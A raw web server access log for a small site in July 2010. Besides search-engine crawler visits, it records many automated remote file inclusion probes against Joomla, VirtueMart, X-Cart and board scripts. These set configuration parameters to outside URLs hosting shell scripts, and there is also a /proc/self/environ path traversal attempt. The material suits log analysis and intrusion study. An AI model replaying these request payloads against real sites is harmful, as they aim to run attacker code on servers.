125.141.91.138 - - [20/Jul/2010:15:18:32 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:15:21:43 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:15:21:43 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:15:21:43 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:15:21:48 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:15:21:48 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:15:21:48 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:21:51 -0700] "GET /logs/access.log//admin/auth.php?xcart_dir=http://solidarcled.com/ijlji/e107.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:21:51 -0700] "GET /admin/auth.php?xcart_dir=http://solidarcled.com/ijlji/e107.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:21:52 -0700] "GET /logs//admin/auth.php?xcart_dir=http://solidarcled.com/ijlji/e107.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:22:06 -0700] "GET /logs/access.log//admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:22:06 -0700] "GET /admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:22:07 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:22:07 -0700] "GET /logs/access.log//admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:22:08 -0700] "GET /admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:22:08 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.98.166 - - [20/Jul/2010:15:24:27 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "www.redneckmba.com"
95.211.98.166 - - [20/Jul/2010:15:24:27 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:31:59 -0700] "GET /logs/access_100614.log//admin/auth.php?xcart_dir=http://solidarcled.com/ijlji/e107.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:32:08 -0700] "GET /logs/access_100614.log//admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:32:08 -0700] "GET /logs/access_100614.log//admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.194 - - [20/Jul/2010:15:41:56 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.108.64.192 - - [20/Jul/2010:15:49:47 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:15:56:58 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:15:58:44 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.207 - - [20/Jul/2010:16:19:07 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.218.116.168 - - [20/Jul/2010:16:37:14 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.redneckmba.com"
88.250.57.232 - - [20/Jul/2010:16:37:59 -0700] "GET /logs/access_100719.log HTTP/1.0" 200 817313 "-" "Wget/1.11.4" "www.redneckmba.com"
188.72.225.209 - - [20/Jul/2010:16:42:15 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)" "www.redneckmba.com"
188.72.225.209 - - [20/Jul/2010:16:42:15 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)" "www.redneckmba.com"
67.195.114.41 - - [20/Jul/2010:17:45:27 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
67.195.114.41 - - [20/Jul/2010:17:45:27 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
67.195.114.41 - - [20/Jul/2010:17:51:44 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
76.13.114.106 - - [20/Jul/2010:17:58:43 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.195.114.41 - - [20/Jul/2010:18:01:19 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
88.131.106.22 - - [20/Jul/2010:18:58:47 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.22 - - [20/Jul/2010:18:58:50 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
81.208.34.38 - - [20/Jul/2010:19:07:16 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [20/Jul/2010:19:07:16 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [20/Jul/2010:19:07:25 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [20/Jul/2010:19:08:04 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [20/Jul/2010:19:08:05 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [20/Jul/2010:19:08:05 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [20/Jul/2010:19:08:56 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [20/Jul/2010:19:08:56 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [20/Jul/2010:19:08:57 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
66.163.171.207 - - [20/Jul/2010:19:09:05 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.189.179.214 - - [20/Jul/2010:19:23:55 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
89.189.179.214 - - [20/Jul/2010:19:23:55 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
89.189.179.214 - - [20/Jul/2010:19:23:55 -0700] "GET /logs/access_100531.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
67.195.114.41 - - [20/Jul/2010:19:26:54 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
67.195.114.41 - - [20/Jul/2010:19:26:55 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
65.52.108.59 - - [20/Jul/2010:19:43:13 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
65.52.108.59 - - [20/Jul/2010:19:57:52 -0700] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
76.13.123.194 - - [20/Jul/2010:20:14:04 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
213.215.178.34 - - [20/Jul/2010:20:43:24 -0700] "GET /delete_comment.php?board_skin_path=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "redneckmba.com"
213.215.178.34 - - [20/Jul/2010:20:43:35 -0700] "GET /delete_comment.php?board_skin_path=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
78.41.204.220 - - [20/Jul/2010:20:56:18 -0700] "GET /send_reminders.php?noSet=0&includedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
76.13.114.107 - - [20/Jul/2010:21:09:25 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
213.215.178.34 - - [20/Jul/2010:21:14:12 -0700] "GET /logs/access_100531.log/delete_comment.php?board_skin_path=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "redneckmba.com"
213.215.178.34 - - [20/Jul/2010:21:14:12 -0700] "GET /delete_comment.php?board_skin_path=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "redneckmba.com"
213.215.178.34 - - [20/Jul/2010:21:14:12 -0700] "GET /logs/delete_comment.php?board_skin_path=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "redneckmba.com"
213.215.178.34 - - [20/Jul/2010:21:14:44 -0700] "GET /logs/access_100614.log/delete_comment.php?board_skin_path=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
213.215.178.34 - - [20/Jul/2010:21:14:44 -0700] "GET /delete_comment.php?board_skin_path=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
213.215.178.34 - - [20/Jul/2010:21:14:44 -0700] "GET /logs/delete_comment.php?board_skin_path=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
66.163.171.205 - - [20/Jul/2010:21:18:29 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
85.255.199.38 - - [20/Jul/2010:21:28:54 -0700] "POST /logs/access_100607.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [20/Jul/2010:21:28:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [20/Jul/2010:21:28:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [20/Jul/2010:21:28:54 -0700] "POST /logs/access_100607.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [20/Jul/2010:21:28:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [20/Jul/2010:21:28:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [20/Jul/2010:21:28:54 -0700] "POST /logs/access_100607.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [20/Jul/2010:21:28:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [20/Jul/2010:21:28:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [20/Jul/2010:21:28:54 -0700] "POST /logs/access_100607.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [20/Jul/2010:21:28:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [20/Jul/2010:21:28:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
62.44.82.118 - - [20/Jul/2010:21:32:11 -0700] "GET /index.php?mosConfig.absolute.path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.82.118 - - [20/Jul/2010:21:32:11 -0700] "GET /logs/access.log%20%20//index.php?mosConfig.absolute.path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.82.118 - - [20/Jul/2010:21:32:11 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [20/Jul/2010:21:38:43 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
96.0.251.231 - - [20/Jul/2010:21:47:18 -0700] "GET /logs/access.log%20%20//index.php?mosConfig.absolute.path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:21:47:18 -0700] "GET /index.php?mosConfig.absolute.path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:21:47:18 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:21:47:19 -0700] "GET /index.php?mosConfig.absolute.path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:21:47:19 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
96.0.251.231 - - [20/Jul/2010:21:47:22 -0700] "GET /logs/access.log%20%20//index.php?mosConfig.absolute.path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
95.158.16.135 - - [20/Jul/2010:21:52:27 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Opera/8.00 (Windows NT 5.1; U; en)" "www.redneckmba.com"
95.158.16.135 - - [20/Jul/2010:21:52:27 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Opera/8.00 (Windows NT 5.1; U; en)" "www.redneckmba.com"
76.13.123.194 - - [20/Jul/2010:21:55:11 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
219.94.128.174 - - [20/Jul/2010:21:55:25 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
219.94.128.174 - - [20/Jul/2010:21:55:26 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
66.163.171.205 - - [20/Jul/2010:21:57:30 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [20/Jul/2010:22:06:57 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
212.227.54.140 - - [20/Jul/2010:22:08:16 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
212.227.54.140 - - [20/Jul/2010:22:08:16 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
212.227.54.140 - - [20/Jul/2010:22:08:16 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
212.227.54.140 - - [20/Jul/2010:22:09:04 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
212.227.54.140 - - [20/Jul/2010:22:09:04 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
212.227.54.140 - - [20/Jul/2010:22:09:04 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.229.45.143 - - [20/Jul/2010:22:14:57 -0700] "GET /logs/access.log%20%20//index.php?option=com_sef&controller=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.229.45.143 - - [20/Jul/2010:22:14:57 -0700] "GET /index.php?option=com_sef&controller=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.229.45.143 - - [20/Jul/2010:22:14:57 -0700] "GET /logs//index.php?option=com_sef&controller=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.229.45.143 - - [20/Jul/2010:22:23:37 -0700] "GET /logs/access.log//index.php?option=com_sef&controller=http://www.thw-recklinghausen.de//e107_themes/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.206 - - [20/Jul/2010:22:35:46 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [20/Jul/2010:22:35:49 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [20/Jul/2010:22:38:31 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
76.13.123.195 - - [20/Jul/2010:22:52:31 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
81.208.34.38 - - [20/Jul/2010:22:52:44 -0700] "GET /logs/access_100614.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [20/Jul/2010:22:55:19 -0700] "GET /logs/access_100614.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
76.13.114.106 - - [20/Jul/2010:23:05:14 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
187.115.172.40 - - [20/Jul/2010:23:10:30 -0700] "GET /logs/access_100329.loghttp:/eddy.lm.free.fr/snde/model/bomtreS.txt? HTTP/1.0" 404 - "-" "-" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:23:14:22 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.musitalentos.com/e107_files/images/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:23:14:22 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.musitalentos.com/e107_files/images/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.redneckmba.com"
66.163.171.206 - - [20/Jul/2010:23:15:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
217.18.65.24 - - [20/Jul/2010:23:17:36 -0700] "GET /administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
